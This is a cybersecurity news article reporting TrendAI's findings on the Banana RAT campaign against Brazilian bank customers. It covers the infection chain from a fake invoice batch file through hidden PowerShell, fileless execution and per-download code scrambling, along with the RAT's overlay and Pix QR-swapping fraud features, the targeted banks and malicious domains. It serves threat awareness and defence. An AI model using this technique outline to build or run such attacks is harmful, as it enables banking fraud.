A new threat called Banana RAT malware is targeting banking customers in Brazil, using fake documents and tools to compromise devices and steal funds. Cybersecurity experts from TrendAI (formerly Trend Micro) found the operation and shared its details with Hackread.com.
Inside the Attack Pipeline
The scam was still active when TrendAI experts began investigating. They collected data directly from the hackers’ live servers between 17 and 22 April 2026 to fully understand how the scam works.
They found that the attackers speak Brazilian Portuguese, operate under the temporary name SHADOW-WATER-063, and are targeting individuals in Brazil’s business sector to deliver the Banana RAT malware. The hackers’ own code stamps revealed their internal project codename as Projeto Banana.
Further probing revealed that scammers trick victims via WhatsApp or phishing links into downloading a fake electronic invoice file named Consultar_NF-e.bat from the domain convitemundial2026.com. When they click on it, this batch file runs a hidden PowerShell command that fetches a second file called msedge.txt.
Now, the scam turns to fileless execution because the main code runs entirely in the computer’s memory and isn’t saved to the disk. And, to avoid detection, the malware copies its files into a fake Microsoft folder path (C:\ProgramData\Microsoft\Diagnosis\ETW).
On the hacker-controlled servers, the group uses FastAPI crypter, a custom obfuscation tool, to manage the attack. They don’t need to send the same file to everyone because this server setup automatically scrambles the code to generate 100 to 200 unique malware versions at once, and since each download is completely different, standard antivirus tools cannot recognise or block the file.
Stealing Money in Real Time
Hackers are basically conducting financial fraud, targeting 16 specific Brazilian banks and crypto exchanges. What makes the Banana RAT operation dangerous is that the malware allows attackers total control by functioning as a live surveillance and theft tool. With features like screen streaming, the hackers can view the victim’s desktop, log keys to steal passwords, and use BlockInput to freeze the victim’s mouse and keyboard.
“What makes this case notable is not just the sophistication of the tooling – it is the intent behind it. This is an operation purpose-built to enable real-time financial fraud: intercepting banking sessions, manipulating payment flows, and deceiving victims when they are most vulnerable,” researchers noted in the blog post.
When a victim opens their online bank, the malware uses a Display Overlay Module to pop up a fake full-screen message saying “Mandatory Security Update – DO NOT TURN OFF YOUR COMPUTER”. While the user waits, the hacker makes illegal transfers in the background.
The malware also has a special feature using the ZXing library to swap Pix QR codes, which is Brazil’s instant-payment system. If a user tries to scan a QR code to pay a bill, the malware changes the data so the money goes straight to the scammers.
The malware targets some of Brazil’s largest retail and corporate financial institutions, including:
- Itaú
- Caixa
- Bradesco
- Santander
- Banco do Brasil (BB)
It also targets regional banks like Banrisul and Daycoval, and cooperative networks like Sicoob and Sicredi.
TrendAI is now working with the Federação Brasileira de Bancos (FEBRABAN) to share intelligence and stop the threat. Until it is dealt with, experts suggest organisations should block network access to the primary command domain, cwindowsk-cdncom to keep systems safe.
Sharing his insights with us over this discovery, TrendAI’s VP of AI Security and Threat Research, Tom Kellermann, stated:
“The Brazilian cybercrime cartels are very sophisticated and organized, and they have been a bane to the financial sector since 2000. The RATs and rootkits they develop are on par with those we have seen from Russia. Insufficient attention is being paid to cybercrime in LATAM, and the financial sector has good reason to be concerned as something wicked comes this way.”
